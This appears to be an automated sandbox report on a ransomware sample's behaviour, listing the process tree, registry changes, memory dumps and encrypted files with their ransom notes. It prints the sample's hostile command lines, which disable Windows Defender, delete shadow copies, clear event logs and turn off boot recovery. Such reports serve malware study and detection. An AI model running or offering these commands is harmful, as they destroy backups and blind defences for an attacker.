| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\notepad.exe
notepad.exe C:\wPfq_HOW_TO_DECRYPT.txt
C:\Windows\system32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
Files
memory/1520-54-0x0000000000000000-mapping.dmp
memory/1912-55-0x0000000000000000-mapping.dmp
memory/524-56-0x0000000000000000-mapping.dmp
memory/560-57-0x0000000000000000-mapping.dmp
memory/668-58-0x0000000000000000-mapping.dmp
memory/1472-59-0x0000000000000000-mapping.dmp
memory/784-60-0x0000000000000000-mapping.dmp
memory/1764-61-0x0000000000000000-mapping.dmp
memory/1744-62-0x0000000000000000-mapping.dmp
memory/1356-63-0x0000000000000000-mapping.dmp
memory/1088-64-0x0000000000000000-mapping.dmp
memory/1080-65-0x0000000000000000-mapping.dmp
memory/1064-66-0x0000000000000000-mapping.dmp
memory/1456-67-0x0000000000000000-mapping.dmp
memory/1904-68-0x0000000000000000-mapping.dmp
memory/1808-69-0x0000000000000000-mapping.dmp
memory/1372-70-0x0000000000000000-mapping.dmp
memory/1236-71-0x0000000000000000-mapping.dmp
memory/2024-72-0x0000000000000000-mapping.dmp
memory/1704-73-0x0000000000000000-mapping.dmp
memory/1008-74-0x0000000000000000-mapping.dmp
memory/2000-75-0x0000000000000000-mapping.dmp
memory/1888-76-0x0000000000000000-mapping.dmp
memory/916-77-0x0000000000000000-mapping.dmp
memory/1244-78-0x0000000000000000-mapping.dmp
memory/1600-79-0x0000000000000000-mapping.dmp
memory/1280-80-0x0000000000000000-mapping.dmp
memory/740-81-0x0000000000000000-mapping.dmp
memory/560-82-0x0000000000000000-mapping.dmp
memory/1248-83-0x0000000000000000-mapping.dmp
memory/808-84-0x0000000000000000-mapping.dmp
memory/1920-85-0x0000000000000000-mapping.dmp
memory/588-86-0x0000000000000000-mapping.dmp
memory/1108-87-0x0000000000000000-mapping.dmp
memory/1456-88-0x0000000000000000-mapping.dmp
memory/1864-89-0x0000000000000000-mapping.dmp
memory/992-90-0x0000000000000000-mapping.dmp
memory/1828-91-0x0000000000000000-mapping.dmp
memory/1772-92-0x0000000000000000-mapping.dmp
memory/1960-93-0x0000000000000000-mapping.dmp
memory/276-94-0x0000000000000000-mapping.dmp
memory/308-95-0x0000000000000000-mapping.dmp
memory/1668-96-0x0000000000000000-mapping.dmp
memory/1768-97-0x0000000000000000-mapping.dmp
memory/1132-98-0x0000000000000000-mapping.dmp
memory/1464-99-0x0000000000000000-mapping.dmp
memory/1124-100-0x0000000000000000-mapping.dmp
memory/1084-101-0x0000000000000000-mapping.dmp
memory/1728-102-0x0000000000000000-mapping.dmp
memory/824-103-0x0000000000000000-mapping.dmp
memory/1608-104-0x0000000000000000-mapping.dmp
memory/700-105-0x0000000000000000-mapping.dmp
memory/684-106-0x0000000000000000-mapping.dmp
memory/1576-107-0x0000000000000000-mapping.dmp
memory/1592-108-0x0000000000000000-mapping.dmp
memory/1228-109-0x0000000000000000-mapping.dmp
memory/852-110-0x0000000000000000-mapping.dmp
memory/1356-111-0x0000000000000000-mapping.dmp
memory/1708-112-0x0000000000000000-mapping.dmp
memory/1708-113-0x000007FEFC061000-0x000007FEFC063000-memory.dmp
memory/1700-114-0x0000000000000000-mapping.dmp
memory/552-116-0x0000000000000000-mapping.dmp
memory/1240-118-0x0000000000000000-mapping.dmp
memory/1192-119-0x0000000000000000-mapping.dmp
memory/1680-120-0x0000000000000000-mapping.dmp
memory/1380-122-0x000007FEF3160000-0x000007FEF3CBD000-memory.dmp
memory/1380-124-0x0000000002782000-0x0000000002784000-memory.dmp
memory/1380-123-0x0000000002780000-0x0000000002782000-memory.dmp
memory/1380-125-0x0000000002784000-0x0000000002787000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 636a642cc51545ec0988c32c35ec97d9 |
| SHA1 | a2cc9c2669d423dc80ab3bad49f166f492580b6b |
| SHA256 | 372ca373730a40c32719de2ac0119671b1e84b31ddb6919e796016562470c584 |
| SHA512 | 90373432cc1b50577b9ef6594bd5673f5fb0a705ef7bf5d1231c879ff043cff1a95c9c9838313173dcaf6958d0583a2723fd36b9c4cf250ec17bbf3b6493ebff |
memory/1940-128-0x000007FEF27C0000-0x000007FEF331D000-memory.dmp
memory/1940-130-0x00000000025D0000-0x00000000025D2000-memory.dmp
memory/1380-129-0x000000000278B000-0x00000000027AA000-memory.dmp
memory/1940-131-0x00000000025D2000-0x00000000025D4000-memory.dmp
memory/1940-132-0x00000000025D4000-0x00000000025D7000-memory.dmp
memory/1940-133-0x00000000025DB000-0x00000000025FA000-memory.dmp
C:\wPfq_HOW_TO_DECRYPT.txt
| MD5 | 3d3aab4fac96343c7e4bf9f111f89193 |
| SHA1 | 550d2ea76bb0a789e4bfbefef4a899c4fbad254c |
| SHA256 | 54643189ee659f0e200ac4eb1ae678f35c016e0905eca63e675dbeadfc2422d8 |
| SHA512 | 15b065276f0f8acd76c54462a6f71153e0df65a10aff76412bf2582940b46ff64124e2577e320220aa9c0daf1e4d3f5fc5d4d78aee5979e60a10690a702badda |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 14:34
Reported
2022-01-12 14:39
Platform
win10-en-20211208
Max time kernel
234s
Max time network
181s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\ReceiveSkip.png => C:\Users\Admin\Pictures\ReceiveSkip.png.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_LAAAACwAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ReceiveSkip.png.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_LAAAACwAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UpdateDismount.raw.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_MAAAADAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ConvertToLock.tif => C:\Users\Admin\Pictures\ConvertToLock.tif.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ConvertToLock.tif.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\FormatSplit.crw => C:\Users\Admin\Pictures\FormatSplit.crw.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_CgAAAAoAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\FormatSplit.crw.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_CgAAAAoAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SyncExport.tiff => C:\Users\Admin\Pictures\SyncExport.tiff.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SyncExport.tiff.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UpdateDismount.raw => C:\Users\Admin\Pictures\UpdateDismount.raw.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_MAAAADAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART9.BDR.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7336_40x40x32.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\fue_3_1.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-disabled.svg.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ca-es\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AgAAAAIAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\.lastModified.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_NgAAADYAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxSignature.p7x | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vreg\powerview.x-none.msi.16.x-none.vreg.dat.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\fi_60x42.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-80_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarMediumTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\cs-cz\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_FgAAABYAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_EgAAABIAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\wPfq_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\ja-JP\wPfq_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Grace-ul-oob.xrm-ms.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\SmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\OutlookMailSmallTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ui-strings.js.A51ubzzUK6rt5aAfj58BEcqW8Zg97FukdebUGgdAYfr_AAAAAAAAAAA0.vl6ia | C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe | N/A |
